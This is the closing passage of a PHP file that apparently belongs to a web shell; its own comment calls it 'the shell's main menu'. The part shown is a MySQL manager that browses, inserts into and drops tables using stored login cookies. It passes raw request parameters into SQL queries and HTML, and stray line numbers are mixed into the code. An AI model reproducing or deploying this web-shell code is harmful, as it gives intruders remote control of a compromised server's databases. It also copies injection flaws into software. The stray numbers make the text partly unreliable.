                        echo "<tr><td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . "\"> 修改 </a> <a href=\"#\" onclick=\"Delok('它','?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . "');return false;\"> 删除 </a></td>";
                        foreach ($fields as $row) {
                            // Cell values are HTML-escaped; Mysql_Len() (defined elsewhere)
                            // presumably truncates to 500 characters.
                            echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . "</td>";
                        }
                        echo "</tr>" . "\r\n";
                        $v++;
                    }
                    echo "</table><div class=\"actall\">";
                    // Pager: first/prev/next/last links plus a jump-to box.
                    $pagep = $page - 1;
                    $pagen = $page + 1;
                    echo "共有 " . $row_num . " 条记录 ";
                    $pagenav = "";
                    $pageStr = $row_num > 0 ? $page : "0";
                    $charseta = isset($_GET['charset']) ? $_GET['charset'] : "";
                    if ($pagep > 0) {
                        $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=1&charset=" . $charseta . "'>首页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagep . "&charset=" . $charseta . "'>上一页</a> ";
                    } else {
                        $pagenav .= " 上一页 ";
                    }
                    if ($pagen <= $pages) {
                        $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagen . "&charset=" . $charseta . "'>下一页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pages . "&charset=" . $charseta . "'>尾页</a>";
                    } else {
                        $pagenav .= " 下一页 ";
                    }
                    $pagenav .= " 第 [" . $pageStr . "/" . $pages . "] 页 跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='" . $pageStr . "' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p='+this.value+'&charset=" . $charseta . "';\" />页";
                    echo $pagenav;
                    echo "</div>";
                }
            } elseif (isset($_GET['insert'])) {
                // Insert view: one empty textarea per column, posting to the table view.
                echo "<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['insert'] . '">' . $_GET['insert'] . "</a></div>";
                // Column metadata is obtained by selecting the whole table.
                $result = @mysql_query("SELECT * FROM " . $_GET['insert'], $conn);
                $fieldnum = @mysql_num_fields($result);
                echo "<form method=\"POST\" action=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['insert'] . '">';
                for ($i = 0; $i < $fieldnum; $i++) {
                    $name = @mysql_field_name($result, $i);
                    $type = @mysql_field_type($result, $i);
                    $len = @mysql_field_len($result, $i);
                    echo "<div class=\"actall\">" . $name . " <font color=\"#FF0000\">" . $type . '(' . $len . ")</font><br><textarea name=\"insql[" . $name . "]\" style=\"width:600px;height:60px;\"></textarea></div>";
                }
                echo "<div class=\"actall\"><input type=\"submit\" value=\"Insert\" style=\"width:80px;\"></div></form>";
            } else {
                // Database view: list tables with collation and data size.
                $query = "SHOW TABLE STATUS";
                $status = @mysql_query($query, $conn);
                while ($statu = @mysql_fetch_array($status)) {
                    $statusize[] = $statu['Data_length'];
                    $statucoll[] = $statu['Collation'];
                }
                // SHOW TABLE STATUS rows are matched to SHOW TABLES rows by index ($k),
                // which assumes both statements return tables in the same order.
                $query = "SHOW TABLES FROM " . $_GET['db'] . ';';
                echo "</div><table border=\"0\"><tr><td class=\"toptd\" style=\"width:550px;\"> 表名 </td><td class=\"toptd\" style=\"width:80px;\"> 操作 </td><td class=\"toptd\" style=\"width:130px;\"> 字符集 </td><td class=\"toptd\" style=\"width:70px;\"> 大小 </td></tr>";
                $result = @mysql_query($query, $conn);
                $k = 0;
                while ($table = @mysql_fetch_row($result)) {
                    // $charset (collation prefix) is computed but never displayed.
                    $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_'));
                    echo "<tr><td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $table[0] . '">' . $table[0] . "</a></td>";
                    echo "<td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&insert=' . $table[0] . "\"> 插入 </a> <a href=\"#\" onclick=\"Delok('" . $table[0] . "','?eanver=mysql_msg&db=" . $_GET['db'] . '&drop=' . $table[0] . "');return false;\"> 删除 </a></td>";
                    // File_Size() is defined elsewhere; presumably formats bytes for display.
                    echo '<td>' . $statucoll[$k] . "</td><td align=\"right\">" . File_Size($statusize[$k]) . "</td></tr>" . "\r\n";
                    $k++;
                }
                echo "</table>";
            }
        }
    } else {
        // Stored credentials no longer work: expire the four cookies and send the
        // operator back to the login form.
        $cookietime = time() - 6 * 3600;
        setcookie($cookie_name_mysql . 'host', "", $cookietime);
        setcookie($cookie_name_mysql . 'port', "", $cookietime);
        setcookie($cookie_name_mysql . 'user', "", $cookietime);
        setcookie($cookie_name_mysql . 'pass', "", $cookietime);
        die("连接MYSQL失败,请重新登陆.<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=mysql_exec\">");
    }
    break;
default:
    // No or unrecognised 'eanver' action: render the shell's main menu
    // (html_main() is defined elsewhere in the file).
    html_main();
    break;
3194}
3195
// Page footer (css_foot() is defined elsewhere), then flush the output buffer that
// was opened earlier in the script so the accumulated HTML is finally sent.
css_foot();
ob_end_flush();